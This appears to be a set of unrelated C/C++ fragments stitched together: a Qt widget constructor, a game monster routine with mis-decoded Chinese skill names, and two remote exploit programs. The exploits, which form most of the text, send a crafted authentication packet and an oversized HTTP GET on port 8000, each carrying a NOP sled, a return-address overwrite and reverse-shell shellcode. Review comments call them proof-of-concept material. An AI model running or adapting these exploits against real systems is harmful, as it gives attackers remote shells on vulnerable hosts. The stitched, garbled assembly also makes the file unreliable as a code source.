// Builds the "Take-Off" central widget.
//
// The constructor wires three things together, in this order:
//   1. a ListCollection holding one CommonList titled "Les Vols Prets",
//      backed by a TousVol object, registered through set_lc();
//   2. a Fly object whose doneVol() signal triggers this widget's setModel() slot;
//   3. a OneATimeShowCollection built around that Fly object, with a
//      DropReceiver attached to it, registered through set_sc() / add_dr().
// lay() is called last, once every part exists.
//
// NOTE(review): none of the objects created with `new` receives a QObject
// parent here. Ownership is presumably taken over by set_lc(), set_sc() and
// add_dr() (declared elsewhere) -- confirm, otherwise they leak when the
// widget is destroyed.
TakeOf::TakeOf(QWidget *parent)
    : AbstractCentWid(parent)
{
    setObjectName("Take-Off");

    // List side: a collection with a single list.
    lc = new ListCollection;
    CommonList *readyFlights = new CommonList("Les Vols Prets", new TousVol);
    lc->append(readyFlights);
    set_lc(lc);

    // Flight object; the view refreshes its model when a flight is done.
    _fly = new Fly();
    connect(_fly, SIGNAL(doneVol()), this, SLOT(setModel()));

    // Show side: the collection displays the flight, the receiver accepts drops on it.
    sc = new OneATimeShowCollection(_fly);
    DropReceiver *receiver = new DropReceiver(sc, true);
    set_sc(sc);
    add_dr(receiver);

    lay();
}
// Re-initialises this monster from a MonsterInfo record.
//
// @param info  source record; its ID, name, Head, level, exp, hp, mp, DC1/DC2,
//              MC1/MC2, AC, MAC and interval fields are read.
// @param boss  stored as-is in bBoss.
// @return always true.
//
// The setters are called in the same order as before, because their side
// effects are not visible from here.
bool CMonster::ReplaceSoul(const MonsterInfo &info, bool boss)
{
    // Identity fields are plain assignments.
    id = info.ID;
    name = info.name;
    bBoss = boss;

    // Attributes go through the class setters.
    set_head(info.Head);
    set_Lv(info.level);
    set_exp(info.exp);
    set_hp_m(info.hp);
    set_mp_m(info.mp);
    set_dc(info.DC1, info.DC2);
    set_mc(info.MC1, info.MC2);
    set_sc(0, 0);                   // the record supplies no value for this pair
    set_ac(info.AC, info.AC);       // a single AC value is used for both arguments
    set_mac(info.MAC, info.MAC);    // likewise for MAC
    set_intervel(info.interval);

    // Candidate skill names, reproduced byte-for-byte.
    // NOTE(review): these literals look like multi-byte text that was decoded
    // with a single-byte code page -- confirm the source file's encoding.
    const QString skillNames[10] = {
        QStringLiteral("ÆË»÷"),
        QStringLiteral("³åײ"),
        QStringLiteral("¿ÖÏÅ"),
        QStringLiteral("·É»÷"),
        QStringLiteral("Ó°»÷"),
        QStringLiteral("¶¾Êõ"),
        QStringLiteral("´ÎÉù²¨"),
        QStringLiteral("¼«ËÙ"),
        QStringLiteral("¾ÞÁ¦"),
        QStringLiteral("¼ṳ̀")
    };

    // qrand() is a non-cryptographic generator; it only picks a display name
    // here. Seeding is not visible in this block.
    const int pick = qrand() % 10;
    skill.name = skillNames[pick];

    return true;
}
/*
 * start_auth - proof-of-concept client routine that drives a three-step
 * exchange over an already-connected socket and then sends one oversized,
 * crafted packet.
 *
 * Parameters:
 *   sock   connected socket to the service under test
 *   rhost  host string passed on to set_sc() and printed at the end
 *   rport  port passed on to set_sc() and printed at the end
 * Returns 0 when the final reply starts with 0x32 0x11, -1 on any
 * unexpected reply (the last failure is reported as "Patched").
 *
 * What the visible code establishes, for analysts and detection authors:
 *   - The peer's first packet must start with 0x30 0x11; it is echoed back
 *     with byte 28 set to 0x00 and byte 36 set to 0x01.
 *   - The second reply must start with 0x10 0x27. Bytes 16/17 are used as an
 *     OS fingerprint and the string at offset 37 as the service-pack string.
 *   - The crafted packet is SIZEOF bytes long and keeps bytes 0-1 of the
 *     previous reply (0x10 0x27). It carries a 180-byte run of 0x90 at offset
 *     416, a 4-byte value at offset 516, an opaque payload from offset 520,
 *     and NUL-terminated profile strings at fixed offsets.
 *   - NOTE(review): the 4-byte value is presumably meant to replace a saved
 *     return address in the service; the server-side copy is not visible here.
 *     A fixed service would have to length-check these fields before copying.
 *
 * SIZEOF, RET, RET_XP, WINUSER, WINHOST, the USERPROFILE_* macros,
 * INTERFACE_IP, WINDOMAIN, CLIENT_VERSION and set_sc() are defined outside
 * this block.
 */
int start_auth(int sock, char *rhost, int rport)
{
    int size,i=4,os,sp;   // i is never used in this function
    char buffer[SIZEOF];
    // Opaque machine-code payload; handed to set_sc() below before it is
    // copied into the packet. Contents are not analysed here.
    char shellc0de[] =
        "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef"
        "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xba\x01\x80\x33\x95"
        "\x43\xe2\xfa\x7e\xfa\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e"
        "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad"
        "\x8b\xe0\xdd\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d"
        "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96"
        "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3"
        "\xae\xe1\xb1\x8d\xe1\x93\xde\xb6\x4e\xe0\x7f\x56\xca\xa6\x5c\xf3"
        "\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e\x8d\x1e\x56\xae"
        "\x54\xe0\x34\x56\x16\x79\xd5\x1e\x79\x14\x79\xb5\x97\x95\x95\xfd"
        "\xec\xd0\xed\xd4\xff\x9f\xff\xde\xff\x95\x7d\xe3\x6a\x6a\x6a\xa6"
        "\x5c\x52\xd0\x69\xe2\xe6\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8"
        "\x97\x1e\x48\xf3\x16\x7e\x91\xc4\xc4\xc6\x6a\x45\x1c\xd0\x91\xfd"
        "\xe7\xf0\xe6\xe6\xff\x9f\xff\xde\xff\x95\x7d\xd3\x6a\x6a\x6a\x1e"
        "\xc8\x91\x1c\xc8\x12\x1c\xd0\x02\x52\xd0\x69\xc2\xc6\xd4\xc6\x52"
        "\xd0\x95\xfa\xf6\xfe\xf0\x52\xd0\x91\xe1\xd4\x95\x95\x1e\x58\xf3"
        "\x16\x7c\x91\xc4\xc6\x6a\x45\xa6\x4e\xc6\xc6\xc6\xc6\xff\x94\xff"
        "\x97\x6a\x45\x1c\xd0\x31\x52\xd0\x69\xf6\xfa\xfb\xfb\x52\xd0\x95"
        "\xf0\xf6\xe1\x95\x1e\x58\xf3\x16\x7c\x91\xc4\x6a\xe0\x12\x6a\xc0"
        "\x02\xa6\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97\x97"
        "\x0f\x96\x46\x52\x97\x55\x3d\x94\x94\xff\x85\xc0\x6a\xe0\x31\x6a"
        "\x45\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xff\x95\x7d\x51\x6b\x6a"
        "\x6a\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d"
        "\x1c\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52"
        "\xd0\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xd8\x31\x1c"
        "\xd8\x71\x1c\xd8\x7d\x1c\xd8\x79\x18\xd8\x65\xc4\x18\xd8\x39\xc4"
        "\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52\xd0"
        "\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xfd\xed\xfc"
        "\xe1\xc1\xff\x94\xff\xde\xff\x95\x7d\xcd\x6b\x6a\x6a\x6a";

    // Step 1: the peer's first packet must start with 0x30 0x11.
    size=recv(sock,buffer,SIZEOF,0);
    if(buffer[0]!=0x30||buffer[1]!=0x11) {
        printf("error: wrong data received\r\n");
        return -1;
    }
    // Echo that packet back with two bytes changed.
    buffer[28]=0x00;buffer[36]=0x01;
    send(sock,buffer,size,0);
    memset(buffer,0,SIZEOF);

    // Step 2: accumulate the information reply.
    printf("[+] Gathering %-30s ...","information");
    // NOTE(review): each recv() may write up to SIZEOF bytes starting at
    // buffer[size], and its return value is added to size unchecked. SIZEOF is
    // defined elsewhere, so whether this stays inside buffer against an
    // arbitrary peer cannot be confirmed from here.
    for(size=0;size<4096;size+=recv(sock,&buffer[size],SIZEOF,0));
    if(buffer[0]!=0x10||buffer[1]!=0x27) {
        printf("error: wrong data received\r\n");
        return -1;
    }
    printf("Done\r\n");

    // Fingerprint taken from the reply: byte 37 is stored as sp, and
    // bytes 16/17 select between the two OS labels printed below.
    sp=(unsigned int)buffer[37];
    printf("[i] Operating system : ");
    if(buffer[16]==0x28||buffer[17]==0x0a) {
        os=1;
        printf("WinXP");
    } else {
        printf("Win2000");
        os=0;
    }
    printf("\r\n[i] Service Pack : %s\r\n",&buffer[37]);

    // Step 3: build the crafted packet in place.
    printf("[+] Setting shellc0de for this %-15s ...","version");
    set_sc(os,sp,rhost,rport,shellc0de);   // defined elsewhere; receives the payload buffer
    memset(&buffer[2],0,SIZEOF-2);         // bytes 0-1 of the previous reply are kept
    strcpy(&buffer[175],WINUSER);
    memset(&buffer[416],0x90,180);         // 180 bytes of 0x90 at offsets 416..595
    if(os==0)
        memcpy(&buffer[516],RET,4);        // 4-byte value chosen by the OS fingerprint
    else
        memcpy(&buffer[516],RET_XP,4);
    memcpy(&buffer[520],shellc0de,sizeof(shellc0de));
    // Remaining profile fields at fixed offsets.
    strcpy(&buffer[1200],WINHOST);strcpy(&buffer[975],USERPROFILE_NAME);
    strcpy(&buffer[1295],USERPROFILE_COMPANY);strcpy(&buffer[1495],USERPROFILE_LICENSE);
    strcpy(&buffer[1755],USERPROFILE_DATE);strcpy(&buffer[2015],WINHOST);
    strcpy(&buffer[2275],INTERFACE_IP);strcpy(&buffer[2535],WINDOMAIN);
    strcpy(&buffer[2795],CLIENT_VERSION);
    printf("Done\r\n");

    printf("[+] Sending evil %-30s ...","packet");
    send(sock,buffer,SIZEOF,0);            // the full SIZEOF bytes are always sent
    memset(buffer,0,SIZEOF);

    // Any reply that does not start with 0x32 0x11 is reported as "Patched".
    size=recv(sock,buffer,SIZEOF,0);
    if(buffer[0]!=0x32||buffer[1]!=0x11) {
        printf("Patched\r\n");
        return -1;
    }
    printf("Done\r\n");
    printf("[i] Shell should be arrived at %s:%d\r\n",rhost,rport);
    return 0;
}
/*
 * Entry point of a proof-of-concept client that sends one oversized HTTP GET
 * request to a service on TCP port 8000.
 *
 * Arguments as read by the code:
 *   argv[1]  target host name (resolved with gethostbyname)
 *   argv[2]  host string passed to set_sc()
 *   argv[3]  port, converted with atoi() and passed to set_sc()
 *   argv[4]  optional selector stored in cible: 0 uses JMP_ESP_2K,
 *            any other value uses JMP_ESP_XP
 *
 * Request layout: "GET /action.htm?action=SendMsg&message=<BadString>",
 * where BadString is filled with 0x90, carries a 4-byte value at offset 256
 * and the ReversShell bytes at offsets 260..622.
 *
 * Defensive notes grounded in this block:
 *   - NOTE(review): the service presumably copies the `message` parameter
 *     into a fixed-size stack buffer without a length check; the server side
 *     is not visible here. The corrective control is a server-side bound on
 *     that parameter.
 *   - Indicators visible in the traffic: a `message` value of several hundred
 *     bytes dominated by 0x90 and other non-printable bytes, and a Host header
 *     hard-coded to "10.0.0.6:8000" whatever the real target is.
 *
 * usage(), banner(), set_sc(), ReversShell, JMP_ESP_2K and JMP_ESP_XP are
 * defined outside this block.
 */
int main(int argc, char *argv[])
{
    int hsocket;
    struct hostent *host;
    struct in_addr adresseIP;
    struct sockaddr_in adressesocket;
    char BadString[700],Request[800];
    int i,len,cible=0;
#ifdef _WIN32
    WSADATA wsaData;
#endif
    if(argc<4) {
        usage(argv[0]);
    }
    if(argc>4) {
        cible=atoi(argv[4]);
    }
    banner();
#ifdef _WIN32
    if(WSAStartup(0x101,&wsaData)) {
        printf("[-] Unable to load winsock\n");
        exit (-1);
    } else {
        printf("[+] Winsock loaded\n");
    }
#endif
    // Create the socket
    if((hsocket=socket(AF_INET,SOCK_STREAM,0))==-1) {
        printf("[-] Can't creat Socket\n");
        exit (-1);
    } else {
        printf("[+] Socket created\n");
    }
    // Resolve the target host name (gethostbyname)
    if((host=gethostbyname(argv[1]))==0) {
        printf("[-] Can't acquire remote info\n");
        close(hsocket);
        exit (-1);
    } else {
        printf("[+] Remote info Acquired\n");
    }
    memcpy(&adresseIP,host->h_addr,host->h_length);
    // Prepare the sockaddr_in structure; the port is fixed at 8000
    memset(&adressesocket,0,sizeof(struct sockaddr_in));
    adressesocket.sin_family=AF_INET;
    adressesocket.sin_port=htons(8000);
    memcpy(&adressesocket.sin_addr,host->h_addr,host->h_length);
    if(connect(hsocket,(struct sockaddr *)&adressesocket,sizeof(struct sockaddr_in))==-1) {
        printf("[-] Can't connect on %s:8000\n",argv[1]);
        close(hsocket);
        exit (-1);
    } else {
        printf("[+] Connected on %s:8000\n",argv[1]);
    }
    // set_sc() is defined elsewhere; it receives argv[2], the numeric argv[3]
    // and the ReversShell buffer.
    set_sc(argv[2], atoi(argv[3]),ReversShell);
    printf("[+] Reverse ShellCode built\n",argv[1]);
    // Fill the whole parameter value with 0x90 ...
    for(i=0; i<700; i++) {
        BadString[i]=(char)0x90;
    }
    // ... then place 363 bytes of ReversShell at offsets 260..622 ...
    for(i=260; i<623; i++) {
        BadString[i]=ReversShell[i-260];
    }
    // ... and a 4-byte value at offset 256, chosen by the cible selector.
    if(cible==0) {
        memcpy(&BadString[256],JMP_ESP_2K,4);
    } else {
        memcpy(&BadString[256],JMP_ESP_XP,4);
    }
    // NOTE(review): index 700 is one past the end of BadString[700].
    BadString[700]=0x00;
    memset(Request,'\x00',sizeof(Request));
    // The Host header is a fixed literal, independent of argv[1].
    sprintf(Request,"GET /action.htm?action=SendMsg&message=%s HTTP/1.1\r\n"
                    "Host: 10.0.0.6:8000\r\n"
                    "\r\n",BadString);
    printf("[+] BadString constructed\n");
    // strlen() is used for the send length, so the request ends at the first NUL byte.
    if((len=send(hsocket,Request,strlen(Request),0))==-1) {
        printf("[-] Error on sending BadString\n");
        close(hsocket);
        exit (-1);
    } else {
        printf("[+] BadString Sended (%d)\n",len);
    }
    return 0;
}